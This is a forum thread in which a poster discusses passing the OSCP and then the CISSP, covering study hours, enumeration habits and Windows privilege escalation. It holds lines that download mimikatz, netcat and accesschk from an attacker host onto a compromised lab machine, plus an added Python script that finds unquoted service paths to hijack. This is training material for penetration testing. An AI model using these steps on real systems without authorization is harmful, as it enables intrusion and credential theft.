CyberCop's OSCP blog
Comments
CyberCop123 Member Posts: 338
srocky wrote: »
Congrats! I'm probably never going to take the exam, but I do enjoy reading about the journey. You put the work in, you deserved to pass!
Thanks srocky! Glad you enjoyed reading it. The exam and certification is not for everyone, especially if your interests lie elsewhere.
JoJoCal wrote: »
Congrats CyberCop!! I thoroughly enjoyed following your journey from start to finish. I know you're trying to knock out the CISSP (probably for resume reasons), but what is next for you in the pentesting realm? Plans to go for OSCE?
Hi JoJoCal - good question. The CISSP is definitely for my resume/CV, I think; in any IT Security role it can be very useful.
The OSCE is a definite possibility. I looked into it last week and it appears to be much more around buffer overflows and things like that. There's a course they recommend doing beforehand as preparation.
My rough plan is CISSP.... then maybe OSCE. I'm hoping to move house this year so it will depend a bit on that as well!
ansionnachcliste wrote: »
Congratulations. Do you think this is possible with doing a couple of hours every night for 90 days?
Basically, studying for this while working a full-time job and keeping the missus happy :P. Off the top of your head, how many hours have you put into this?
Hey,
It depends a bit on your experience and prior knowledge I think. In the first stages when you read the PDF and watch the videos, it's perfect to study for 2 hours each night as you're reading and learning things from a book.
When you get to the labs I think it's better if you try to do longer sessions. So rather than 2 hours each night, I would aim for 1-2 long sessions per week and the rest of the time just have off.
The reason I say that is that it sometimes takes a few hours to really get in the zone and find the holes. It's hard to sit down and just start hacking straight off.
I have no idea how many hours I spent working on it, hundreds and hundreds. I read the Georgia Weidman book before and sometimes during my OSCP time and that helped too.
I would say not to rush or be too worried about time. It took me 120 days. I had no issue with taking longer. Some weeks I did nothing, literally 0 hours, and some weeks I did 30 hours. 90 days is a good starting point though and you can achieve a lot in that time. I would also consider doing an exam attempt at the end just to try your luck with it. For example if you've hacked 20 machines, you may have a chance of passing and at the very least you'll practice and have some idea what you're dealing with.

Congrats, good job, and good luck on your future!
Thank you very much!
My Aims
2017: OSCP - COMPLETED
2018: CISSP - COMPLETED
2019: GIAC GNFA - Advanced Network Forensics & Threat Hunting - COMPLETED
GIAC GREM - Reverse Engineering of Malware - COMPLETED
2021: CCSP
2022: OSWE (hopefully)
CyberCop123 Member Posts: 338

Congratulations, your thread gave me anxiety. After reading and going through everything I look back to your first posts. Do you feel you have a better feeling of a process now? A methodology per se? I know this is something you struggled with at first. A few other questions.
It was very concerning to hear about being stuck on a machine for 10+ hours trying to get a low priv shell. Any idea why it takes so long?
Any additional resources for enumeration? Your last post described the way I feel very much, that no one really explains it in this context. They either talk about enumeration from the context of a real life test with LinkedIn and other stuff that won't exist in the lab, or they focus on one tool or the other.
Do you have any advice on improving in your weak point area? Escalating privileges was yours, and I could see in part due to a lack of enumeration, but is there anything else I should know?
Writing my blog gave me anxiety! So it's no surprise you had some from reading it. Good questions...
1) I think my methodology is still a bit messy but that's just the way I am and it seems to work to an extent. In every part of my life I am a bit hacky but I generally work efficiently and get a decent outcome. I think you've got to try to have a process, and also be a bit natural with it and go with the flow. The more you do in the labs the more you'll instinctively find a route or way in.
2) Enumeration - I think just researching online and making your own notes is the way to go. For example, if it's a Samba service, then you'll find articles and exploits; from this you can write down syntax and a guide for yourself. Then the next time you get one you'll just copy/paste the syntax and commands and it will be 100x quicker than the first time.
3) Why it takes so long - well it's a few things. Sometimes it's because you're trying too hard. By that I mean many people think there's some very complex and clever, cutting edge hack to gain entry. However, most of the time it's something stupid like a password is in plain text somewhere. It's also because I spent too long sometimes on one machine. E.g. often if you move on and leave it, you'll come back a week later and within an hour have full access just because you're fresh and have a new mindset. It's also about learning. E.g. in the earlier stages I was typing things in without much understanding of why or what it meant. The more I did it, the more I found I was only doing things which were useful and I had a better understanding of what they meant. You can't really teach this, it's just experience. If you do the OSCP it will naturally come.
4) No specific resources, just research online. As stated I think enumeration just means "keep digging". Nothing more magical than that. Again experience is helpful as normally certain ports come up but aren't particularly vulnerable. Likewise instincts help to highlight ports which just don't look right. Keep digging as the machine is vulnerable, it is hackable and it's just a case of finding the hole.
5) Privilege Escalation. Well people always use FuzzySecurity | Windows Privilege Escalation Fundamentals for Windows, and in this article is a good video http://www.youtube.com/watch?v=kMG8IsCohHA - I watched this twice and the more you do the more you see what avenues of escalation there are. It's not rocket science - keep telling yourself that. There's only a few possibilities for escalation. Many times it comes down to a service being configured wrongly - e.g. meaning that you can change it... or there's unquoted paths in the registry, meaning you can make it execute your own .exe file, or there's a password loose somewhere. Something like that.
Anytime I gained access to a Windows lab machine I would do the following:
cscript wget.vbs http://myip/accesschk.exe C:\accesschk.exe
cscript wget.vbs http://myip/mimikatz.exe C:\mimikatz.exe
cscript wget.vbs http://myip/nc.exe C:\nc.exe
etc..... etc....
This was just part of the process each time.
Also remember to Google the Windows service, the Linux kernel version etc. and try a few online exploits if they exist.
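A worked example of the unquoted service path check mentioned in the post above. This is added here for illustration; it is not the poster's code and not part of the PWK course material. It assumes you have copied the output of `wmic service get name,pathname,startmode` off the target; the sample rows below are constructed, not captured from a real lab machine, and the service names are made up.

```python
r"""Unquoted service path check.

Parse the fixed-width output of `wmic service get name,pathname,startmode`, flag
services whose binary path contains spaces but is not wrapped in quotes, and list
the paths Windows will try before the real binary (the hijack candidates).
"""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass
class Service:
    name: str
    path: str        # PathName column: image path, possibly followed by arguments
    start_mode: str  # Auto / Manual / Disabled


# Constructed sample rows (not from a real host), laid out in the fixed-width columns
# wmic prints, so parse_wmic() sees the same shape as real output.
_ROWS = [
    ("Name", "PathName", "StartMode"),
    ("Spooler", r"C:\Windows\System32\spoolsv.exe", "Auto"),
    ("VulnSvc", r"C:\Program Files\Vuln Corp\Agent Service\agent.exe -run", "Auto"),
    ("QuotedSvc", r'"C:\Program Files\Good Corp\svc host.exe" --daemon', "Auto"),
    ("ManualSvc", r"C:\Tools\My Tools\tool.exe", "Manual"),
]
SAMPLE_WMIC = "\n".join(f"{n:<24}{p:<64}{s}" for n, p, s in _ROWS) + "\n"

# An unquoted PathName is "<path to .exe> [arguments]"; take everything up to the first .exe
_EXE_RE = re.compile(r"^(.*?\.exe)", re.IGNORECASE)


def parse_wmic(text: str) -> list[Service]:
    """Split wmic output into Service records using the header's column offsets."""
    lines = [ln.rstrip() for ln in text.splitlines() if ln.strip()]
    header, rows = lines[0], lines[1:]
    starts = [m.start() for m in re.finditer(r"\S+", header)]
    bounds = list(zip(starts, starts[1:] + [None]))
    return [Service(*(row[a:b].strip() for a, b in bounds)) for row in rows]


def image_path(pathname: str) -> tuple[str, bool]:
    """Return (executable path, was_quoted) for a PathName that may carry arguments."""
    if pathname.startswith('"'):
        end = pathname.find('"', 1)
        return pathname[1:end], True
    m = _EXE_RE.match(pathname)
    exe = m.group(1) if m else pathname.split(" ")[0]
    return exe, False


def hijack_candidates(exe: str) -> list[str]:
    r"""Paths Windows tries, in order, before the real binary when the path is unquoted.

    For C:\Program Files\Vuln Corp\agent.exe the service manager first tries
    C:\Program.exe, then C:\Program Files\Vuln.exe; a binary dropped at any writable
    one of those runs as the service account (SYSTEM for most services).
    """
    return [exe[:i] + ".exe" for i, ch in enumerate(exe) if ch == " "]


def find_unquoted(services: list[Service]) -> dict[str, list[str]]:
    """Map each vulnerable service name to its ordered list of hijack candidates."""
    findings: dict[str, list[str]] = {}
    for svc in services:
        exe, quoted = image_path(svc.path)
        if quoted or " " not in exe:
            continue  # quoted, or no spaces: CreateProcess has nothing to misparse
        findings[svc.name] = hijack_candidates(exe)
    return findings


if __name__ == "__main__":
    for name, candidates in find_unquoted(parse_wmic(SAMPLE_WMIC)).items():
        print(f"[!] {name}: unquoted path with spaces")
        for c in candidates:
            print(f"      try: {c}")
```

Finding a candidate is only half the check: you still need write access to the directory where the fake binary would live, which is what the accesschk.exe the poster uploads is for (e.g. `accesschk.exe -uwdq "C:\Program Files\Vuln Corp"` lists who can write there). A service that starts automatically fires on reboot; for a Manual one you need rights to start it yourself.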
CyberCop123 Member Posts: 338

Congrats! I knew you'd pass and welcome aboard!!
Thank you! I am honoured to be part of the club.

Amazing job! These threads motivate me so much, especially when it ends with a win!
I really want to dive in, but I think I'll start off with baby steps and begin with the eJPT. I have very limited InfoSec experience (only around 1.5 years) and 0 on the offensive side of things.
Good luck with the CISSP, I'm sure you'll do just as well.
No issue with starting out with eJPT, I looked at that myself. Just take it a step at a time, and you'll pick up lots of knowledge and at some point you'll feel ready to give the OSCP a try. Good luck!

Congrats on passing. You mentioned forums you were using to see if you were on the right track. What forums were you using?

hal9k2 wrote: »
I am currently on the PWK course and I believe he was talking about the OSCP forums, where access is only allowed to people that bought the course and lab access. These forums have a lot of important stuff related to the course and lab boxes. However, big spoilers are moderated by the forum admins, but anyway they can get you on track.
Yep, hal9k2 is correct, the offsec forums were what I meant. Just small subtle hints. E.g. you see tons of threads talking about the web service, and that would then confirm to you that you're on the right path. Just to be clear, I would only go there after quite a number of hours of being stuck.
CyberCop123 Member Posts: 338

Congrats on passing your exam!!! I'm taking a similar approach in that I'm taking my time going through the videos/pdf before tackling the labs. It's rough, because I really want to jump in ... but I have no prior experience with pen testing so I need to learn the basics. I'm hoping to finish going through the material by next week, and then fully jump into the labs. It's extremely encouraging to see that someone with a similar approach was able to get through it all and pass.
The CISSP is more a business/managerial/procedural based exam. Depending on your experience (just like with any other exam), you can push through the material quickly, or it could take you longer.
So, funny story. Last year I accepted a job position overseas, on the condition that I pass the CISSP within six months of hire. Getting the CISSP was already something I wanted to get anyway, so I agreed. Went through the hiring process, accepted the offer. On the morning I was going to give notice, I got a call from the new job. The position requirements changed, the CISSP was needed on hire. They wanted me to take the exam that week... I was able to get them to give me three weeks.
At this point, I hadn't started preparing at all. First week I didn't do much studying, but really pushed the material hard the last two weeks. My test was scheduled at a testing center about an hour away from where I lived, so I stayed at a hotel the night before and stayed up late pushing through practice questions. The next morning I took the test. I finished in about 2 hours, and passed.
I'm pretty sure I was only able to pass that quickly because of my background. I had about 3 years' experience as a network administrator, and then almost 2 years in INFOSEC doing certification and accreditation in a couple of different roles. This helped tremendously; a lot of the stuff on the test was things I had learned about/experienced while working.
The CISSP exam has changed recently, not the content but the actual exam format itself: https://www.isc2.org/Certifications/CISSP/CISSP-CAT
Here are the resources I used to study:
Eric Conrad Books:
https://www.amazon.com/gp/product/0128024372/
https://www.amazon.com/gp/product/
Cybrary Course:
https://www.cybrary.it/course/cissp/
CCCure Questions:
https://www.freepracticetests.org/quiz/index.php
I hope this helps!
Good luck with the OSCP, I think your approach is sensible and it makes sense - learn the theory and then put it into practice. Worked well for me and others. The only ones not doing this are experienced pen testers who know it already.
Very, very helpful post regarding the CISSP. I was aware of the new format change. I am about to start a blog on my CISSP journey - so keep an eye out for it. I have so far read up to and including Chapter 3 of the Sybex book. This is still Domain 1. I'm finding that it all links together a little, but the number of acronyms is so frustrating. There are hundreds, and for silly things as well.
I'm always unsure about the experience that some say helps. I've been a web developer, done some Linux admin before, Python, my OSCP and worked for the Police, but not sure I have "infosec experience" in the general sense. Some parts of the CISSP look more comfortable to me, stuff on networking and cryptography.
I think Domain 1 may be the biggest area for me to learn about as it is completely and totally management orientated. I have a loose plan to be ready for the exam in 11 weeks time. Hopefully that is realistic.
Can't believe your CISSP story, that is incredible! Also amazing that you passed too, that must have been so stressful. Well done and hopefully your job is going well.
Thanks for your help and advice.